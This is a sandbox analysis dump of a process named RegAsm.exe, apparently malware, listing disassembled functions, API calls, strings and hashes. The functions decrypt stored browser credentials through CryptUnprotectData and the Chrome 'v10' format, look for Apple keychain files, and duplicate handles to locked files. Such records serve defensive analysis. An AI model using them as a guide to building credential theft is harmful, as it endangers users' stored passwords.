39327->39350 39329 409634 39332 409648 39329->39332 39367 4091b8 238 API calls 39329->39367 39331 40b2cc 27 API calls 39333 40965d 39331->39333 39332->39331 39334 408801 39332->39334 39335 409d1f 6 API calls 39333->39335 39334->38725 39334->38757 39336 40966d 39335->39336 39351 409b98 GetFileAttributesW 39336->39351 39338 40967c 39338->39334 39352 409529 39338->39352 39350->39329 39351->39338 39368 4096c3 CreateFileW 39352->39368 39354 409543 39355 4095cd 39354->39355 39356 409550 GetFileSize 39354->39356 39355->39334 39357 409577 CloseHandle 39356->39357 39358 40955f 39356->39358 39357->39355 39363 409585 39357->39363 39359 40afcf 2 API calls 39358->39359 39363->39355 39364 4095c3 
39363->39364 39370 408b8d 38 API calls 39363->39370 39367->39332 39368->39354 39370->39363 39399 413f4f 39372->39399 39375 413f37 K32GetModuleFileNameExW 39376 413f4a 39375->39376 39376->38786 39378 413969 wcscpy 39377->39378 39379 41396c wcschr 39377->39379 39391 413a3a 39378->39391 39379->39378 39381 41398e 39379->39381 39403 4097f7 wcslen wcslen _memicmp 39381->39403 39383 41399a 39384 4139a4 memset 39383->39384 39385 4139e6 39383->39385 39404 409dd5 GetWindowsDirectoryW wcscpy 39384->39404 39387 413a31 wcscpy 39385->39387 39388 4139ec memset 39385->39388 39387->39391 39405 409dd5 GetWindowsDirectoryW wcscpy 39388->39405 39389 4139c9 wcscpy wcscat 39389->39391 39391->38786 39392 413a11 memcpy wcscat 39392->39391 39394 413cb0 GetModuleHandleW 39393->39394 39395 413cda 39393->39395 39394->39395 39396 413cbf 39394->39396 39397 413ce3 GetProcessTimes 39395->39397 39398 413cf6 39395->39398 39396->39395 39397->38788 39398->38788 39400 413f54 39399->39400 39402 413f2f 39399->39402 39401 40a804 8 API calls 39400->39401 39401->39402 39402->39375 39402->39376 39403->39383 39404->39389 39405->39392 39406->38808 39407->38831 39409 409cf9 GetVersionExW 39408->39409 39410 409d0a 39408->39410 39409->39410 39410->38838 39410->38842 39411->38845 39412->38848 39413->38850 39414->38895 39416 40bba5 39415->39416 39550 40cc26 39416->39550 39419 40bd4b 39571 40cc0c 39419->39571 39424 40b2cc 27 API calls 39425 40bbef 39424->39425 39578 40ccf0 _wcsicmp 39425->39578 39427 40bbf5 39427->39419 39579 40ccb4 6 API calls 39427->39579 39429 40bc26 39430 40cf04 17 API calls 39429->39430 39431 40bc2e 39430->39431 39432 40bd43 39431->39432 39433 40b2cc 27 API calls 39431->39433 39434 40cc0c 4 API calls 39432->39434 39435 40bc40 39433->39435 39434->39419 39580 40ccf0 _wcsicmp 39435->39580 39437 40bc61 memset memset WideCharToMultiByte 39581 40103c strlen 39437->39581 39438 40bc46 39438->39432 39438->39437 39440 40bcc0 39441 40b273 27 API calls 39440->39441 39442 40bcd0 memcmp 39441->39442 
39442->39432 39443 40bce2 39442->39443 39444 404423 37 API calls 39443->39444 39445 40bd10 39444->39445 39445->39432 39446 40bd3a LocalFree 39445->39446 39447 40bd1f memcpy 39445->39447 39446->39432 39447->39446 39448->38910 39450 4438b5 11 API calls 39449->39450 39451 44444c 39450->39451 39452 40b879 39451->39452 39641 415a6d 39451->39641 39452->38913 39452->38914 39454 4442e6 11 API calls 39456 44469e 39454->39456 39455 444486 39457 4444b9 memcpy 39455->39457 39494 4444a4 39455->39494 39456->39452 39459 443d90 110 API calls 39456->39459 39645 415258 39457->39645 39459->39452 39460 444524 39461 444541 39460->39461 39462 44452a 39460->39462 39648 444316 39461->39648 39463 416935 16 API calls 39462->39463 39463->39494 39466 444316 18 API calls 39467 444563 39466->39467 39468 444316 18 API calls 39467->39468 39469 44456f 39468->39469 39470 444316 18 API calls 39469->39470 39471 44457f 39470->39471 39471->39494 39662 432d4e 39471->39662 39474 444316 18 API calls 39475 4445b0 39474->39475 39666 41eed2 39475->39666 39477 4445cf 39478 4445d6 39477->39478 39479 4445ee 39477->39479 39482 416935 16 API calls 39478->39482 39682 43302c 39479->39682 39482->39494 39494->39454 39777 438460 39495->39777 39497 40b8a4 39497->38920 39521 4251c4 39497->39521 39499 443da3 39498->39499 39517 443db6 39498->39517 39865 41707a 11 API calls 39499->39865 39501 443da8 39502 443dbc 39501->39502 39503 443dac 39501->39503 39867 4300e8 memset memset memcpy 39502->39867 39866 4446ea 11 API calls 39503->39866 39506 443de0 39507 416935 16 API calls 39506->39507 39507->39517 39508 443dce 39508->39506 39512 443e22 39508->39512 39509 443e5a 39869 4300e8 memset memset memcpy 39509->39869 39512->39509 39868 41f0ac 102 API calls 39512->39868 39513 443e63 39514 416935 16 API calls 39513->39514 39515 443f3b 39514->39515 39515->39517 39870 42320f memset memcpy 39515->39870 39517->38913 39519 409a74 GetTempFileNameW 39518->39519 39520 409a66 GetWindowsDirectoryW 39518->39520 39519->38907 39520->39519 39871 
424f07 39521->39871 39523 4251e4 39524 4251f7 39523->39524 39525 4251e8 39523->39525 39879 4250f8 39524->39879 39878 4446ea 11 API calls 39525->39878 39527 4251f2 39527->38945 39529 425209 39531 425249 39529->39531 39535 4250f8 126 API calls 39529->39535 39536 425287 39529->39536 39887 4384e9 134 API calls 39529->39887 39888 424f74 123 API calls 39529->39888 39530 415c7d 16 API calls 39530->39527 39531->39536 39889 424ff0 13 API calls 39531->39889 39535->39529 39536->39530 39537 425266 39537->39536 39890 415be9 memcpy 39537->39890 39539->38945 39540->38945 39541->38945 39542->38945 39543->38945 39544->38945 39545->38945 39546->38945 39547->38945 39548->38920 39549->38942 39582 4096c3 CreateFileW 39550->39582 39552 40cc34 39553 40cc3d GetFileSize 39552->39553 39554 40bbca 39552->39554 39555 40afcf 2 API calls 39553->39555 39554->39419 39562 40cf04 39554->39562 39556 40cc64 39555->39556 39583 40a2ef ReadFile 39556->39583 39558 40cc71 39584 40ab4a MultiByteToWideChar 39558->39584 39560 40cc95 CloseHandle 39561 40b04b ??3@YAXPAX 39560->39561 39561->39554 39563 40b633 ??3@YAXPAX 39562->39563 39564 40cf14 39563->39564 39590 40b1ab ??3@YAXPAX ??3@YAXPAX 39564->39590 39566 40bbdd 39566->39419 39566->39424 39567 40cf1b 39567->39566 39569 40cfef 39567->39569 39591 40cd4b 39567->39591 39570 40cd4b 14 API calls 39569->39570 39570->39566 39572 40b633 ??3@YAXPAX 39571->39572 39573 40cc15 39572->39573 39574 40aa04 ??3@YAXPAX 39573->39574 39575 40cc1d 39574->39575 39640 40b1ab ??3@YAXPAX ??3@YAXPAX 39575->39640 39577 40b7d4 memset CreateFileW 39577->38900 39577->38901 39578->39427 39579->39429 39580->39438 39581->39440 39582->39552 39583->39558 39585 40ab93 39584->39585 39586 40ab6b 39584->39586 39585->39560 39587 40a9ce 4 API calls 39586->39587 39588 40ab74 39587->39588 39589 40ab7c MultiByteToWideChar 39588->39589 39589->39585 39590->39567 39592 40cd7b 39591->39592 39625 40aa29 39592->39625 39594 40cef5 39595 40aa04 ??3@YAXPAX 39594->39595 39596 40cefd 39595->39596 39596->39567 
39598 40aa29 6 API calls 39599 40ce1d 39598->39599 39600 40aa29 6 API calls 39599->39600 39601 40ce3e 39600->39601 39602 40ce6a 39601->39602 39633 40abb7 wcslen memmove 39601->39633 39603 40ce9f 39602->39603 39636 40abb7 wcslen memmove 39602->39636 39606 40a8d0 7 API calls 39603->39606 39609 40ceb5 39606->39609 39607 40ce56 39634 40aa71 wcslen 39607->39634 39608 40ce8b 39637 40aa71 wcslen 39608->39637 39615 40a8d0 7 API calls 39609->39615 39612 40ce5e 39635 40abb7 wcslen memmove 39612->39635 39613 40ce93 39638 40abb7 wcslen memmove 39613->39638 39617 40cecb 39615->39617 39639 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39617->39639 39619 40cedd 39620 40aa04 ??3@YAXPAX 39619->39620 39621 40cee5 39620->39621 39622 40aa04 ??3@YAXPAX 39621->39622 39623 40ceed 39622->39623 39624 40aa04 ??3@YAXPAX 39623->39624 39624->39594 39626 40aa33 39625->39626 39627 40aa63 39625->39627 39628 40aa44 39626->39628 39629 40aa38 wcslen 39626->39629 39627->39594 39627->39598 39630 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39628->39630 39629->39628 39631 40aa4d 39630->39631 39631->39627 39632 40aa51 memcpy 39631->39632 39632->39627 39633->39607 39634->39612 39635->39602 39636->39608 39637->39613 39638->39603 39639->39619 39640->39577 39642 415a77 39641->39642 39643 415a8d 39642->39643 39644 415a7e memset 39642->39644 39643->39455 39644->39643 39646 4438b5 11 API calls 39645->39646 39647 41525d 39646->39647 39647->39460 39649 444328 39648->39649 39650 444423 39649->39650 39651 44434e 39649->39651 39715 4446ea 11 API calls 39650->39715 39652 432d4e 3 API calls 39651->39652 39654 44435a 39652->39654 39656 444375 39654->39656 39661 44438b 39654->39661 39655 432d4e 3 API calls 39657 4443ec 39655->39657 39658 416935 16 API calls 39656->39658 39659 444381 39657->39659 39660 416935 16 API calls 39657->39660 39658->39659 39659->39466 39660->39659 39661->39655 39663 432d65 39662->39663 39664 432d58 39662->39664 39663->39474 39716 432cc4 memset memset memcpy 39664->39716 39667 41eee2 39666->39667 
[Control-flow graph edge data (node ids, function addresses and API call counts) whose rendered graph is not reproduced in this extract. The functions covered include ones calling memset/memcpy, FindResourceW/SizeofResource/LoadResource/LockResource, EnumResourceNamesW, SetFilePointer/ReadFile/GetLastError, UnmapViewOfFile/CloseHandle/Sleep, FreeLibrary and GetPrivateProfileIntW/WritePrivateProfileStringW.]

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
[Control-flow graph for the function at 40dd85-40e01b (basic-block edges not reproduced). The blocks call memset, CreateFileW, NtQuerySystemInformation, CloseHandle, GetCurrentProcessId, _wcsicmp, OpenProcess, GetCurrentProcess and DuplicateHandle, matching the API list below.]
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040DDAD
                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                        • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                        • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                        • memset.MSVCRT ref: 0040DF5F
                                                                        • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                        • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                        • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                        • API String ID: 2018390131-3398334509
                                                                        • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                        • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                        APIs
                                                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                          • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                        Similarity
                                                                        • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                        • String ID:
                                                                        • API String ID: 2947809556-0
                                                                        • Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                        • Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                        Similarity
                                                                        • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 1945712969-0
                                                                        • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                        • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                        Similarity
                                                                        • API ID: FileFind$FirstNext
                                                                        • String ID:
                                                                        • API String ID: 1690352074-0
                                                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041898C
                                                                        • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystemmemset
                                                                        • String ID:
                                                                        • API String ID: 3558857096-0
                                                                        • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                        • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                        Control-flow Graph

                                                                        [Control-flow graph image for the function starting at 0044553B (basic blocks drawn with an Executed / Not Executed legend); the graph layout data is not reproduced here.]
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004455C2
                                                                        • wcsrchr.MSVCRT ref: 004455DA
                                                                        • memset.MSVCRT ref: 0044570D
                                                                        • memset.MSVCRT ref: 00445725
                                                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                          • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                        • memset.MSVCRT ref: 0044573D
                                                                        • memset.MSVCRT ref: 00445755
                                                                        • memset.MSVCRT ref: 004458CB
                                                                        • memset.MSVCRT ref: 004458E3
                                                                        • memset.MSVCRT ref: 0044596E
                                                                        • memset.MSVCRT ref: 00445A10
                                                                        • memset.MSVCRT ref: 00445A28
                                                                        • memset.MSVCRT ref: 00445AC6
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                        • memset.MSVCRT ref: 00445B52
                                                                        • memset.MSVCRT ref: 00445B6A
                                                                        • memset.MSVCRT ref: 00445C9B
                                                                        • memset.MSVCRT ref: 00445CB3
                                                                        • _wcsicmp.MSVCRT ref: 00445D56
                                                                        • memset.MSVCRT ref: 00445B82
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                        • memset.MSVCRT ref: 00445986
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                        • API String ID: 381723030-3798722523
                                                                        • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                        • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                        • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                        • API String ID: 1442760552-28296030
                                                                        • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                        • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                        • wcsrchr.MSVCRT ref: 0040B738
                                                                        • memset.MSVCRT ref: 0040B756
                                                                        • memset.MSVCRT ref: 0040B7F5
                                                                        • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                        • memset.MSVCRT ref: 0040B851
                                                                        • memset.MSVCRT ref: 0040B8CA
                                                                        • memcmp.MSVCRT ref: 0040B9BF
                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                        • memset.MSVCRT ref: 0040BB53
                                                                        • memcpy.MSVCRT ref: 0040BB66
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                        • String ID: chp$v10
                                                                        • API String ID: 229402216-2783969131
                                                                        • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                        • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                        Control-flow Graph

                                                                        [Control-flow graph image for the function starting at 00413D4C (basic blocks drawn with an Executed / Not Executed legend); the graph layout data is not reproduced here.]
                                                                        APIs
                                                                          • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                        • memset.MSVCRT ref: 00413D7F
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                        • memset.MSVCRT ref: 00413E07
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                        • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                        • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                        • API String ID: 3791284831-1740548384
                                                                        • Opcode ID: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                        • Opcode Fuzzy Hash: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                          • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                          • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                        • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                          • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
